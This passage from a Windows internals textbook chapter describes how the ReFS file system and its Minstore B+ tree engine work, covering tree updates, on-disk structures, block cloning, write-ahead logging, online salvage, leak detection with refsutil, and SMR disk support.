to each Minstore’s root table—usually the directory and file table—which
keeps track of which bucket is dirty, freed, or deleted. This table will never
be stored on the disk. In Minstore, the terms bucket and page are used
interchangeably; a page usually resides in memory, whereas a bucket is
stored on disk, but they express exactly the same high-level concept. Trees
and tables also are used interchangeably, which explains why the page table
is called as it is. The rows of a page table are composed of the LCN of the
target bucket, as a Key, and a data structure that keeps track of the page states
and assists the synchronization of the B+ tree as a value.
When a page is first read or created, a new entry will be inserted into the
hash table that represents the page table. An entry into the page table can be
deleted only if all the following conditions are met:
■ There are no active transactions accessing the page.
■ The page is clean and has no modifications.
■ The page is not a copy-on-write new page of a previous one.
Thanks to these rules, clean pages usually come into the page table and are
deleted from it repeatedly, whereas a page that is dirty would stay in the page
table until the B+ tree is updated and finally written to disk. The process of
writing the tree to stable media depends heavily upon the state in the page
table at any given time. As you can see from Figure 11-82, the page table is
used by Minstore as an in-memory cache, producing an implicit state
machine that describes each state of a page.
Figure 11-82 The diagram shows the states of a dirty page (bucket) in the
page table. A new page is produced due to copy-on-write of an old page or
if the B+ tree is growing and needs more space for storing the bucket.
Minstore I/O
In Minstore, reads and writes to the B+ tree in the final physical medium are
performed in a different way: tree reads usually happen in portions, meaning
that the read operation might only include some leaf buckets, for example,
and occurs as part of transactional access or as a preemptive prefetch action.
After a bucket is read into the cache (see the “Cache manager” section earlier
in this chapter), Minstore still can’t interpret its data because the bucket
checksum needs to be verified. The expected checksum is stored in the parent
node: when the ReFS driver (which resides above Minstore) intercepts the
read data, it knows that the node still needs to be validated: the parent node is
already in the cache (the tree has been already navigated for reaching the
child) and contains the checksum of the child. Minstore has all the needed
information for verifying that the bucket contains valid data. Note that there
could be pages in the page table that have been never accessed. This is
because their checksum still needs to be validated.
Minstore performs tree updates by writing the entire B+ tree as a single
transaction. The tree update process writes dirty pages of the B+ tree to the
physical disk. There are multiple reasons behind a tree update—an
application explicitly flushing its changes, the system running in low
memory or similar conditions, the cache manager flushing cached data to
disk, and so on. It’s worth mentioning that Minstore usually writes the new
updated trees lazily with the lazy writer thread. As seen in the previous
section, there are several triggers to kick in the lazy writer (for example,
when the number of the dirty pages reaches a certain threshold).
Minstore is unaware of the actual reason behind the tree update request.
The first thing that Minstore does is make sure that no other transactions are
modifying the tree (using complex synchronization primitives). After initial
synchronization, it starts to write dirty pages and with old deleted pages. In a
write-to-new implementation, a new page represents a bucket that has been
modified and its content replaced; a freed page is an old page that needs to be
unlinked from the parent. If a transaction wants to modify a leaf node, it
copies (in memory) the root bucket and the leaf page; Minstore then creates
the corresponding page table entries in the page table without modifying any
link.
The tree update algorithm enumerates each page in the page table.
However, the page table has no concept of which level in the B+ tree the
page resides, so the algorithm checks even the B+ tree by starting from the
more external node (usually the leaf), up to the root nodes. For each page, the
algorithm performs the following steps:
1.
Checks the state of the page. If it’s a freed page, it skips the page. If
it’s a dirty page, it updates its parent pointer and checksum and puts
the page in an internal list of pages to write.
2.
Discards the old page.
When the algorithm reaches the root node, it updates its parent pointer and
checksum directly in the object table and finally puts also the root bucket in
the list of pages to write. Minstore is now able to write the new tree in the
free space of the underlying volume, preserving the old tree in its original
location. The old tree is only marked as freed but is still present in the
physical medium. This is an important characteristic that summarizes the
write-to-new strategy and allows the ReFS file system (which resides above
Minstore) to support advanced online recovery features. Figure 11-83 shows
an example of the tree update process for a B+ table that contains two new
leaf pages (A’ and B’). In the figure, pages located in the page table are
represented in a lighter shade, whereas the old pages are shown in a darker
shade.
Figure 11-83 Minstore tree update process.
Maintaining exclusive access to the tree while performing the tree update
can represent a performance issue; no one else can read or write from a B+
tree that has been exclusively locked. In the latest versions of Windows 10,
B+ trees in Minstore became generational—a generation number is attached
to each B+ tree. This means that a page in the tree can be dirty with regard to
a specific generation. If a page is originally dirty for only a specific tree
generation, it can be directly updated, with no need to copy-on-write because
the final tree has still not been written to disk.
In the new model, the tree update process is usually split in two phases:
■ Failable phase: Minstore acquires the exclusive lock on the tree,
increments the tree’s generation number, calculates and allocates the
needed memory for the tree update, and finally drops the lock to
shared.
■ Nonfailable phase: This phase is executed with a shared lock
(meaning that other I/O can read from the tree), Minstore updates the
links of the director nodes and all the tree’s checksums, and finally
writes the final tree to the underlying disk. If another transaction
wants to modify the tree while it’s being written to disk, it detects that
the tree’s generation number is higher, so it copy-on-writes the tree
again.
With the new schema, Minstore holds the exclusive lock only in the
failable phase. This means that tree updates can run in parallel with other
Minstore transactions, significantly improving the overall performance.
ReFS architecture
As already introduced in previous paragraphs, ReFS (the Resilient file
system) is a hybrid of the NTFS implementation and Minstore, where every
file and directory is a B+ tree configured by a particular schema. The file
system volume is a flat namespace of directories. As discussed previously,
NTFS is composed of different components:
■ Core FS support: Describes the interface between the file system
and other system components, like the cache manager and the I/O
subsystem, and exposes the concept of file create, open, read, write,
close, and so on.
■ High-level FS feature support: Describes the high-level features of a
modern file system, like file compression, file links, quota tracking,
reparse points, file encryption, recovery support, and so on.
■ On-disk dependent components and data structures MFT and file
records, clusters, index package, resident and nonresident attributes,
and so on (see the “The NT file system (NTFS)” section earlier in this
chapter for more details).
ReFS keeps the first two parts largely unchanged and replaces the rest of
the on-disk dependent components with Minstore, as shown in Figure 11-84.
Figure 11-84 ReFS architecture’s scheme.
In the “NTFS driver” section of this chapter, we introduced the entities
that link a file handle to the file system’s on-disk structure. In the ReFS file
system driver, those data structures (the stream control block, which
represents the NTFS attribute that the caller is trying to read, and the file
control block, which contains a pointer to the file record in the disk’s MFT)
are still valid, but have a slightly different meaning in respect to their
underlying durable storage. The changes made to these objects go through
Minstore instead of being directly translated in changes to the on-disk MFT.
As shown in Figure 11-85, in ReFS:
■ A file control block (FCB) represents a single file or directory and, as
such, contains a pointer to the Minstore B+ tree, a reference to the
parent directory’s stream control block and key (the directory name).
The FCB is pointed to by the file object, through the FsContext2 field.
■ A stream control block (SCB) represents an opened stream of the file
object. The data structure used in ReFS is a simplified version of the
NTFS one. When the SCB represents directories, though, the SCB has
a link to the directory’s index, which is located in the B+ tree that
represents the directory. The SCB is pointed to by the file object,
through the FsContext field.
■ A volume control block (VCB) represents a currently mounted
volume, formatted by ReFS. When a properly formatted volume has
been identified by the ReFS driver, a VCB data structure is created,
attached into the volume device object extension, and linked into a list
located in a global data structure that the ReFS file system driver
allocates at its initialization time. The VCB contains a table of all the
directory FCBs that the volume has currently opened, indexed by their
reference ID.
Figure 11-85 ReFS files and directories in-memory data structures.
In ReFS, every open file has a single FCB in memory that can be pointed
to by different SCBs (depending on the number of streams opened). Unlike
NTFS, where the FCB needs only to know the MFT entry of the file to
correctly change an attribute, the FCB in ReFS needs to point to the B+ tree
that represents the file record. Each row in the file’s B+ tree represents an
attribute of the file, like the ID, full name, extents table, and so on. The key
of each row is the attribute code (an integer value).
File records are entries in the directory in which files reside. The root node
of the B+ tree that represents a file is embedded into the directory entry’s
value data and never appears in the object table. The file data streams, which
are represented by the extents table, are embedded B+ trees in the file record.
The extents table is indexed by range. This means that every row in the
extent table has a VCN range used as the row’s key, and the LCN of the
file’s extent used as the row’s value. In ReFS, the extents table could become
very large (it is indeed a regular B+ tree). This allows ReFS to support huge
files, bypassing the limitations of NTFS.
Figure 11-86 shows the object table, files, directories, and the file extent
table, which in ReFS are all represented through B+ trees and provide the file
system namespace.
Figure 11-86 Files and directories in ReFS.
Directories are Minstore B+ trees that are responsible for the single, flat
namespace. A ReFS directory can contain:
■ Files
■ Links to directories
■ Links to other files (file IDs)
Rows in the directory B+ tree are composed of a <key, <type, value>>
pair, where the key is the entry’s name and the value depends on the type of
directory entry. With the goal of supporting queries and other high-level
semantics, Minstore also stores some internal data in invisible directory rows.
These kinds of rows have have their key starting with a Unicode zero
character. Another row that is worth mentioning is the directory’s file row.
Every directory has a record, and in ReFS that file record is stored as a file
row in the self-same directory, using a well-known zero key. This has some
effect on the in-memory data structures that ReFS maintains for directories.
In NTFS, a directory is really a property of a file record (through the Index
Root and Index Allocation attributes); in ReFS, a directory is a file record
stored in the directory itself (called directory index record). Therefore,
whenever ReFS manipulates or inspects files in a directory, it must ensure
that the directory index is open and resident in memory. To be able to update
the directory, ReFS stores a pointer to the directory’s index record in the
opened stream control block.
The described configuration of the ReFS B+ trees does not solve an
important problem. Every time the system wants to enumerate the files in a
directory, it needs to open and parse the B+ tree of each file. This means that
a lot of I/O requests to different locations in the underlying medium are
needed. If the medium is a rotational disk, the performance would be rather
bad.
To solve the issue, ReFS stores a STANDARD_INFORMATION data
structure in the root node of the file’s embedded table (instead of storing it in
a row of the child file’s B+ table). The STANDARD _INFORMATION data
includes all the information needed for the enumeration of a file (like the
file’s access time, size, attributes, security descriptor ID, the update sequence
number, and so on). A file’s embedded root node is stored in a leaf bucket of
the parent directory’s B+ tree. By having the data structure located in the
file’s embedded root node, when the system enumerates files in a directory, it
only needs to parse entries in the directory B+ tree without accessing any B+
tables describing individual files. The B+ tree that represents the directory is
already in the page table, so the enumeration is quite fast.
ReFS on-disk structure
This section describes the on-disk structure of a ReFS volume, similar to the
previous NTFS section. The section focuses on the differences between
NTFS and ReFS and will not cover the concepts already described in the
previous section.
The Boot sector of a ReFS volume consists of a small data structure that,
similar to NTFS, contains basic volume information (serial number, cluster
size, and so on), the file system identifier (the ReFS OEM string and
version), and the ReFS container size (more details are covered in the
“Shingled magnetic recording (SMR) volumes” section later in the chapter).
The most important data structure in the volume is the volume super block. It
contains the offset of the latest volume checkpoint records and is replicated
in three different clusters. ReFS, to be able to mount a volume, reads one of
the volume checkpoints, verifies and parses it (the checkpoint record includes
a checksum), and finally gets the offset of each global table.
The volume mounting process opens the object table and gets the needed
information for reading the root directory, which contains all of the directory
trees that compose the volume namespace. The object table, together with the
container table, is indeed one of the most critical data structures that is the
starting point for all volume metadata. The container table exposes the
virtualization namespace, so without it, ReFS would not able to correctly
identify the final location of any cluster. Minstore optionally allows clients to
store information within its object table rows. The object table row values, as
shown in Figure 11-87, have two distinct parts: a portion owned by Minstore
and a portion owned by ReFS. ReFS stores parent information as well as a
high watermark for USN numbers within a directory (see the section
“Security and change journal” later in this chapter for more details).
Figure 11-87 The object table entry composed of a ReFS part (bottom
rectangle) and Minstore part (top rectangle).
Object IDs
Another problem that ReFS needs to solve regards file IDs. For various
reasons—primarily for tracking and storing metadata about files in an
efficient way without tying information to the namespace—ReFS needs to
support applications that open a file through their file ID (using the
OpenFileById API, for example). NTFS accomplishes this through the
$Extend\$ObjId file (using the $0 index root attribute; see the previous NTFS
section for more details). In ReFS, assigning an ID to every directory is
trivial; indeed, Minstore stores the object ID of a directory in the object table.
The problem arises when the system needs to be able to assign an ID to a file;
ReFS doesn’t have a central file ID repository like NTFS does. To properly
find a file ID located in a directory tree, ReFS splits the file ID space into two
portions: the directory and the file. The directory ID consumes the directory
portion and is indexed into the key of an object table’s row. The file portion
is assigned out of the directory’s internal file ID space. An ID that represents
a directory usually has a zero in its file portion, but all files inside the
directory share the same directory portion. ReFS supports the concept of file
IDs by adding a separate row (composed of a <FileId, FileName> pair) in
the directory’s B+ tree, which maps the file ID to the file name within the
directory.
When the system is required to open a file located in a ReFS volume using
its file ID, ReFS satisfies the request by:
1.
Opening the directory specified by the directory portion
2.
Querying the FileId row in the directory B+ tree that has the key
corresponding to the file portion
3.
Querying the directory B+ tree for the file name found in the last
lookup.
Careful readers may have noted that the algorithm does not explain what
happens when a file is renamed or moved. The ID of a renamed file should
be the same as its previous location, even if the ID of the new directory is
different in the directory portion of the file ID. ReFS solves the problem by
replacing the original file ID entry, located in the old directory B+ tree, with
a new “tombstone” entry, which, instead of specifying the target file name in
its value, contains the new assigned ID of the renamed file (with both the
directory and the file portion changed). Another new File ID entry is also
allocated in the new directory B+ tree, which allows assigning the new local
file ID to the renamed file. If the file is then moved to yet another directory,
the second directory has its ID entry deleted because it’s no longer needed;
one tombstone, at most, is present for any given file.
Security and change journal
The mechanics of supporting Windows object security in the file system lie
mostly in the higher components that are implemented by the portions of the
file system remained unchanged since NTFS. The underlying on-disk
implementation has been changed to support the same set of semantics. In
ReFS, object security descriptors are stored in the volume’s global security
directory B+ table. A hash is computed for every security descriptor in the
table (using a proprietary algorithm, which operates only on self-relative
security descriptors), and an ID is assigned to each.
When the system attaches a new security descriptor to a file, the ReFS
driver calculates the security descriptor’s hash and checks whether it’s
already present in the global security table. If the hash is present in the table,
ReFS resolves its ID and stores it in the STANDARD_INFORMATION data
structure located in the embedded root node of the file’s B+ tree. In case the
hash does not already exist in the global security table, ReFS executes a
similar procedure but first adds the new security descriptor in the global B+
tree and generates its new ID.
The rows of the global security table are of the format <<hash, ID>,
<security descriptor, ref. count>>, where the hash and the ID are as
described earlier, the security descriptor is the raw byte payload of the
security descriptor itself, and ref. count is a rough estimate of how many
objects on the volume are using the security descriptor.
As described in the previous section, NTFS implements a change journal
feature, which provides applications and services with the ability to query
past changes to files within a volume. ReFS implements an NTFS-
compatible change journal implemented in a slightly different way. The
ReFS journal stores change entries in the change journal file located in
another volume’s global Minstore B+ tree, the metadata directory table.
ReFS opens and parses the volume’s change journal file only once the
volume is mounted. The maximum size of the journal is stored in the
$USN_MAX attribute of the journal file. In ReFS, each file and directory
contains its last USN (update sequence number) in the
STANDARD_INFORMATION data structure stored in the embedded root
node of the parent directory. Through the journal file and the USN number of
each file and directory, ReFS can provide the three FSCTL used for reading
and enumerate the volume journal file:
■ FSCTL_READ_USN_JOURNAL: Reads the USN journal directly.
Callers specify the journal ID they’re reading and the number of the
USN record they expect to read.
■ FSCTL_READ_FILE_USN_DATA: Retrieves the USN change
journal information for the specified file or directory.
■ FSCTL_ENUM_USN_DATA: Scans all the file records and
enumerates only those that have last updated the USN journal with a
USN record whose USN is within the range specified by the caller.
ReFS can satisfy the query by scanning the object table, then scanning
each directory referred to by the object table, and returning the files in
those directories that fall within the timeline specified. This is slow
because each directory needs to be opened, examined, and so on.
(Directories’ B+ trees can be spread across the disk.) The way ReFS
optimizes this is that it stores the highest USN of all files in a
directory in that directory’s object table entry. This way, ReFS can
satisfy this query by visiting only directories it knows are within the
range specified.
ReFS advanced features
In this section, we describe the advanced features of ReFS, which explain
why the ReFS file system is a better fit for large server systems like the ones
used in the infrastructure that provides the Azure cloud.
File’s block cloning (snapshot support) and sparse
VDL
Traditionally, storage systems implement snapshot and clone functionality at
the volume level (see dynamic volumes, for example). In modern datacenters,
when hundreds of virtual machines run and are stored on a unique volume,
such techniques are no longer able to scale. One of the original goals of the
ReFS design was to support file-level snapshots and scalable cloning support
(a VM typically maps to one or a few files in the underlying host storage),
which meant that ReFS needed to provide a fast method to clone an entire file
or even only chunks of it. Cloning a range of blocks from one file into a
range of another file allows not only file-level snapshots but also finer-
grained cloning for applications that need to shuffle blocks within one or
more files. VHD diff-disk merge is one example.
ReFS exposes the new FSCTL_DUPLICATE_EXTENTS_TO_FILE to
duplicate a range of blocks from one file into another range of the same file
or to a different file. Subsequent to the clone operation, writes into cloned
ranges of either file will proceed in a write-to-new fashion, preserving the
cloned block. When there is only one remaining reference, the block can be
written in place. The source and target file handle, and all the details from
which the block should be cloned, which blocks to clone from the source,
and the target range are provided as parameters.
As already seen in the previous section, ReFS indexes the LCNs that make
up the file’s data stream into the extent index table, an embedded B+ tree
located in a row of the file record. To support block cloning, Minstore uses a
new global index B+ tree (called the block count reference table) that tracks
the reference counts of every extent of blocks that are currently cloned. The
index starts out empty. The first successful clone operation adds one or more
rows to the table, indicating that the blocks now have a reference count of
two. If one of the views of those blocks were to be deleted, the rows would
be removed. This index is consulted in write operations to determine if write-
to-new is required or if write-in-place can proceed. It’s also consulted before
marking free blocks in the allocator. When freeing clusters that belong to a
file, the reference counts of the cluster-range is decremented. If the reference
count in the table reaches zero, the space is actually marked as freed.
Figure 11-88 shows an example of file cloning. After cloning an entire file
(File 1 and File 2 in the picture), both files have identical extent tables, and
the Minstore block count reference table shows two references to both
volume extents.
Figure 11-88 Cloning an ReFS file.
Minstore automatically merges rows in the block reference count table
whenever possible with the intention of reducing the size of the table. In
Windows Server 2016, HyperV makes use of the new cloning FSCTL. As a
result, the duplication of a VM, and the merging of its multiple snapshots, is
extremely fast.
ReFS supports the concept of a file Valid Data Length (VDL), in a similar
way to NTFS. Using the $$ZeroRangeInStream file data stream, ReFS keeps
track of the valid or invalid state for each allocated file’s data block. All the
new allocations requested to the file are in an invalid state; the first write to
the file makes the allocation valid. ReFS returns zeroed content to read
requests from invalid file ranges. The technique is similar to the DAL, which
we explained earlier in this chapter. Applications can logically zero a portion
of file without actually writing any data using the FSCTL_SET_ZERO_DATA
file system control code (the feature is used by HyperV to create fixed-size
VHDs very quickly).
EXPERIMENT: Witnessing ReFS snapshot support
through HyperV
In this experiment, you’re going to use HyperV for testing the
volume snapshot support of ReFS. Using the HyperV manager, you
need to create a virtual machine and install any operating system on
it. At the first boot, take a checkpoint on the VM by right-clicking
the virtual machine name and selecting the Checkpoint menu item.
Then, install some applications on the virtual machine (the example
below shows a Windows Server 2012 machine with Office
installed) and take another checkpoint.
If you turn off the virtual machine and, using File Explorer,
locate where the virtual hard disk file resides, you will find the
virtual hard disk and multiple other files that represent the
differential content between the current checkpoint and the
previous one.
If you open the HyperV Manager again and delete the entire
checkpoint tree (by right-clicking the first root checkpoint and
selecting the Delete Checkpoint Subtree menu item), you will
find that the entire merge process takes only a few seconds. This is
explained by the fact that HyperV uses the block-cloning support
of ReFS, through the FSCTL_DUPLICATE_EXTENTS_TO_FILE
I/O control code, to properly merge the checkpoints’ content into
the base virtual hard disk file. As explained in the previous
paragraphs, block cloning doesn’t actually move any data. If you
repeat the same experiment with a volume formatted using an
exFAT or NTFS file system, you will find that the time needed to
merge the checkpoints is much larger.
ReFS write-through
One of the goals of ReFS was to provide close to zero unavailability due to
file system corruption. In the next section, we describe all of the available
online repair methods that ReFS employs to recover from disk damage.
Before describing them, it’s necessary to understand how ReFS implements
write-through when it writes the transactions to the underlying medium.
The term write-through refers to any primitive modifying operation (for
example, create file, extend file, or write block) that must not complete until
the system has made a reasonable guarantee that the results of the operation
will be visible after crash recovery. Write-through performance is critical for
different I/O scenarios, which can be broken into two kinds of file system
operations: data and metadata.
When ReFS performs an update-in-place to a file without requiring any
metadata mutation (like when the system modifies the content of an already-
allocated file, without extending its length), the write-through performance
has minimal overhead. Because ReFS uses allocate-on-write for metadata,
it’s expensive to give write-through guarantees for other scenarios when
metadata change. For example, ensuring that a file has been renamed implies
that the metadata blocks from the root of the file system down to the block
describing the file’s name must be written to a new location. The allocate-on-
write nature of ReFS has the property that it does not modify data in place.
One implication of this is that recovery of the system should never have to
undo any operations, in contrast to NTFS.
To achieve write-through, Minstore uses write-ahead-logging (or WAL).
In this scheme, shown in Figure 11-89, the system appends records to a log
that is logically infinitely long; upon recovery, the log is read and replayed.
Minstore maintains a log of logical redo transaction records for all tables
except the allocator table. Each log record describes an entire transaction,
which has to be replayed at recovery time. Each transaction record has one or
more operation redo records that describe the actual high-level operation to
perform (such as insert [key K / value V] pair in Table X). The transaction
record allows recovery to separate transactions and is the unit of atomicity
(no transactions will be partially redone). Logically, logging is owned by
every ReFS transaction; a small log buffer contains the log record. If the
transaction is committed, the log buffer is appended to the in-memory
volume log, which will be written to disk later; otherwise, if the transaction
aborts, the internal log buffer will be discarded. Write-through transactions
wait for confirmation from the log engine that the log has committed up until
that point, while non-write-through transactions are free to continue without
confirmation.
Figure 11-89 Scheme of Minstore’s write-ahead logging.
Furthermore, ReFS makes use of checkpoints to commit some views of the
system to the underlying disk, consequently rendering some of the previously
written log records unnecessary. A transaction’s redo log records no longer
need to be redone once a checkpoint commits a view of the affected trees to
disk. This implies that the checkpoint will be responsible for determining the
range of log records that can be discarded by the log engine.
ReFS recovery support
To properly keep the file system volume available at all times, ReFS uses
different recovery strategies. While NTFS has similar recovery support, the
goal of ReFS is to get rid of any offline check disk utilities (like the Chkdsk
tool used by NTFS) that can take many hours to execute in huge disks and
require the operating system to be rebooted. There are mainly four ReFS
recovery strategies:
■ Metadata corruption is detected via checksums and error-correcting
codes. Integrity streams validate and maintain the integrity of the
file’s data using a checksum of the file’s actual content (the checksum
is stored in a row of the file’s B+ tree table), which maintains the
integrity of the file itself and not only on its file-system metadata.
■ ReFS intelligently repairs any data that is found to be corrupt, as long
as another valid copy is available. Other copies might be provided by
ReFS itself (which keeps additional copies of its own metadata for
critical structures such as the object table) or through the volume
redundancy provided by Storage Spaces (see the “Storage Spaces”
section later in this chapter).
■ ReFS implements the salvage operation, which removes corrupted
data from the file system namespace while it’s online.
■ ReFS rebuilds lost metadata via best-effort techniques.
The first and second strategies are properties of the Minstore library on
which ReFS depends (more details about the integrity streams are provided
later in this section). The object table and all the global Minstore B+ tree
tables contain a checksum for each link that points to the child (or director)
nodes stored in different disk blocks. When Minstore detects that a block is
not what it expects, it automatically attempts repair from one of its duplicated
copies (if available). If the copy is not available, Minstore returns an error to
the ReFS upper layer. ReFS responds to the error by initializing online
salvage.
The term salvage refers to any fixes needed to restore as much data as
possible when ReFS detects metadata corruption in a directory B+ tree.
Salvage is the evolution of the zap technique. The goal of the zap was to
bring back the volume online, even if this could lead to the loss of corrupted
data. The technique removed all the corrupted metadata from the file
namespace, which then became available after the repair.
Assume that a director node of a directory B+ tree becomes corrupted. In
this case, the zap operation will fix the parent node, rewriting all the links to
the child and rebalancing the tree, but the data originally pointed by the
corrupted node will be completely lost. Minstore has no idea how to recover
the entries addressed by the corrupted director node.
To solve this problem and properly restore the directory tree in the salvage
process, ReFS needs to know subdirectories’ identifiers, even when the
directory table itself is not accessible (because it has a corrupted director
node, for example). Restoring part of the lost directory tree is made possible
by the introduction of a volume global table, called called the parent-child
table, which provides a directory’s information redundancy.
A key in the parent–child table represents the parent table’s ID, and the
data contains a list of child table IDs. Salvage scans this table, reads the child
tables list, and re-creates a new non-corrupted B+ tree that contains all the
subdirectories of the corrupted node. In addition to needing child table IDs,
to completely restore the corrupted parent directory, ReFS still needs the
name of the child tables, which were originally stored in the keys of the
parent B+ tree. The child table has a self-record entry with this information
(of type link to directory; see the previous section for more details). The
salvage process opens the recovered child table, reads the self-record, and
reinserts the directory link into the parent table. The strategy allows ReFS to
recover all the subdirectories of a corrupted director or root node (but still not
the files). Figure 11-90 shows an example of zap and salvage operations on a
corrupted root node representing the Bar directory. With the salvage
operation, ReFS is able to quickly bring the file system back online and loses
only two files in the directory.
Figure 11-90 Comparison between the zap and salvage operations.
The ReFS file system, after salvage completes, tries to rebuild missing
information using various best-effort techniques; for example, it can recover
missing file IDs by reading the information from other buckets (thanks to the
collating rule that separates files’ IDs and tables). Furthermore, ReFS also
augments the Minstore object table with a little bit of extra information to
expedite repair. Although ReFS has these best-effort heuristics, it’s important
to understand that ReFS primarily relies on the redundancy provided by
metadata and the storage stack in order to repair corruption without data loss.
In the very rare cases in which critical metadata is corrupted, ReFS can
mount the volume in read-only mode, but not for any corrupted tables. For
example, in case that the container table and all of its duplicates would all be
corrupted, the volume wouldn’t be mountable in read-only mode. By
skipping over these tables, the file system can simply ignore the usage of
such global tables (like the allocator, for example), while still maintaining a
chance for the user to recover her data.
Finally, ReFS also supports file integrity streams, where a checksum is
used to guarantee the integrity of a file’s data (and not only of the file
system’s metadata). For integrity streams, ReFS stores the checksum of each
run that composes the file’s extent table (the checksum is stored in the data
section of an extent table’s row). The checksum allows ReFS to validate the
integrity of the data before accessing it. Before returning any data that has
integrity streams enabled, ReFS will first calculate its checksum and
compares it to the checksum contained in the file metadata. If the checksums
don’t match, then the data is corrupt.
The ReFS file system exposes the FSCTL_SCRUB_DATA control code,
which is used by the scrubber (also known as the data integrity scanner). The
data integrity scanner is implemented in the Discan.dll library and is exposed
as a task scheduler task, which executes at system startup and every week.
When the scrubber sends the FSCTL to the ReFS driver, the latter starts an
integrity check of the entire volume: the ReFS driver checks the boot section,
each global B+ tree, and file system’s metadata.
Note
The online Salvage operation, described in this section, is different from
its offline counterpart. The refsutil.exe tool, which is included in
Windows, supports this operation. The tool is used when the volume is so
corrupted that it is not even mountable in read-only mode (a rare
condition). The offline Salvage operation navigates through all the
volume clusters, looking for what appears to be metadata pages, and uses
best-effort techniques to assemble them back together.
Leak detection
A cluster leak describes the situation in which a cluster is marked as
allocated, but there are no references to it. In ReFS, cluster leaks can happen
for different reasons. When a corruption is detected on a directory, online
salvage is able to isolate the corruption and rebuild the tree, eventually losing
only some files that were located in the root directory itself. A system crash
before the tree update algorithm has written a Minstore transaction to disk
can lead to a file name getting lost. In this case, the file’s data is correctly
written to disk, but ReFS has no metadata that point to it. The B+ tree table
representing the file itself can still exist somewhere in the disk, but its
embedded table is no longer linked in any directory B+ tree.
The built-in refsutil.exe tool available in Windows supports the Leak
Detection operation, which can scan the entire volume and, using Minstore,
navigate through the entire volume namespace. It then builds a list of every
B+ tree found in the namespace (every tree is identified by a well-known
data structure that contains an identification header), and, by querying the
Minstore allocators, compares the list of each identified tree with the list of
trees that have been marked valid by the allocator. If it finds a discrepancy,
the leak detection tool notifies the ReFS file system driver, which will mark
the clusters allocated for the found leaked tree as freed.
Another kind of leak that can happen on the volume affects the block
reference counter table, such as when a cluster’s range located in one of its
rows has a higher reference counter number than the actual files that
reference it. The lower-case tool is able to count the correct number of
references and fix the problem.
To correctly identify and fix leaks, the leak detection tool must operate on
an offline volume, but, using a similar technique to NTFS’ online scan, it can
operate on a read-only snapshot of the target volume, which is provided by
the Volume Shadow Copy service.
EXPERIMENT: Use Refsutil to find and fix leaks on a
ReFS volume
In this experiment, you use the built-in refsutil.exe tool on a ReFS
volume to find and fix cluster leaks that could happen on a ReFS
volume. By default, the tool doesn’t require a volume to be
unmounted because it operates on a read-only volume snapshot. To
let the tool fix the found leaks, you can override the setting by
using the /x command-line argument. Open an administrative
command prompt and type the following command. (In the
example, a 1 TB ReFS volume was mounted as the E: drive. The /v
switch enables the tool’s verbose output.)
Click here to view code image
C:\>refsutil leak /v e:
Creating volume snapshot on drive \\?\Volume{92aa4440-51de-
4566-8c00-bc73e0671b92}...
Creating the scratch file...
Beginning volume scan... This may take a while...
Begin leak verification pass 1 (Cluster leaks)...
End leak verification pass 1. Found 0 leaked clusters on the
volume.
Begin leak verification pass 2 (Reference count leaks)...
End leak verification pass 2. Found 0 leaked references on
the volume.
Begin leak verification pass 3 (Compacted cluster leaks)...
End leak verification pass 3.
Begin leak verification pass 4 (Remaining cluster leaks)...
End leak verification pass 4. Fixed 0 leaks during this
pass.
Finished.
Found leaked clusters: 0
Found reference leaks: 0
Total cluster fixed : 0
Shingled magnetic recording (SMR) volumes
At the time of this writing, one of the biggest problems that classical rotating
hard disks are facing is in regard to the physical limitations inherent to the
recording process. To increase disk size, the drive platter area density must
always increase, while, to be able to read and write tiny units of information,
the physical size of the heads of the spinning drives continue to get
increasingly smaller. In turn, this causes the energy barrier for bit flips to
decrease, which means that ambient thermal energy is more likely to
accidentally flip flip bits, reducing data integrity. Solid state drives (SSD)
have spread to a lot of consumer systems, large storage servers require more
space and at a lower cost, which rotational drives still provide. Multiple
solutions have been designed to overcome the rotating hard-disk problem.
The most effective is called shingled magnetic recording (SMR), which is
shown in Figure 11-91. Unlike PMR (perpendicular magnetic recording),
which uses a parallel track layout, the head used for reading the data in SMR
disks is smaller than the one used for writing. The larger writer means it can
more effectively magnetize (write) the media without having to compromise
readability or stability.
Figure 11-91 In SMR disks, the writer track is larger than the reader track.
The new configuration leads to some logical problems. It is almost
impossible to write to a disk track without partially replacing the data on the
consecutive track. To solve this problem, SMR disks split the drive into
zones, which are technically called bands. There are two main kinds of
zones:
■ Conventional (or fast) zones work like traditional PMR disks, in
which random writes are allowed.
■ Write pointer zones are bands that have their own “write pointer” and
require strictly sequential writes. (This is not exactly true, as host-
aware SMR disks also support a concept of write preferred zones, in
which random writes are still supported. This kind of zone isn’t used
by ReFS though.)
Each band in an SMR disk is usually 256 MB and works as a basic unit of
I/O. This means that the system can write in one band without interfering
with the next band. There are three types of SMR disks:
■ Drive-managed: The drive appears to the host identical to a
nonshingled drive. The host does not need to follow any special
protocol, as all handling of data and the existence of the disk zones
and sequential write constraints is managed by the device’s firmware.
This type of SMR disk is great for compatibility but has some
limitations–the disk cache used to transform random writes in
sequential ones is limited, band cleaning is complex, and sequential
write detection is not trivial. These limitations hamper performance.
■ Host-managed: The device requires strict adherence to special I/O
rules by the host. The host is required to write sequentially as to not
destroy existing data. The drive refuses to execute commands that
violate this assumption. Host-managed drives support only sequential
write zones and conventional zones, where the latter could be any
media including non-SMR, drive-managed SMR, and flash.
■ Host-aware: A combination of drive-managed and host-managed, the
drive can manage the shingled nature of the storage and will execute
any command the host gives it, regardless of whether it’s sequential.
However, the host is aware that the drive is shingled and is able to
query the drive for getting SMR zone information. This allows the
host to optimize writes for the shingled nature while also allowing the
drive to be flexible and backward-compatible. Host-aware drives
support the concept of sequential write preferred zones.
At the time of this writing, ReFS is the only file system that can support
host-managed SMR disks natively. The strategy used by ReFS for supporting
these kinds of drives, which can achieve very large capacities (20 terabytes
or more), is the same as the one used for tiered volumes, usually generated by
Storage Spaces (see the final section for more information about Storage
Spaces).
ReFS support for tiered volumes and SMR
Tiered volumes are similar to host-aware SMR disks. They’re composed of a
fast, random access area (usually provided by a SSD) and a slower sequential
write area. This isn’t a requirement, though; tiered disks can be composed by
different random-access disks, even of the same speed. ReFS is able to
properly manage tiered volumes (and SMR disks) by providing a new logical
indirect layer between files and directory namespace on the top of the volume
namespace. This new layer divides the volume into logical containers, which
do not overlap (so a given cluster is present in only one container at time). A
container represents an area in the volume and all containers on a volume are
always of the same size, which is defined based on the type of the underlying
disk: 64 MB for standard tiered disks and 256 MB for SMR disks. Containers
are called ReFS bands because if they’re used with SMR disks, the
containers’ size becomes exactly the same as the SMR bands’ size, and each
container maps one-to-one to each SMR band.
The indirection layer is configured and provided by the global container
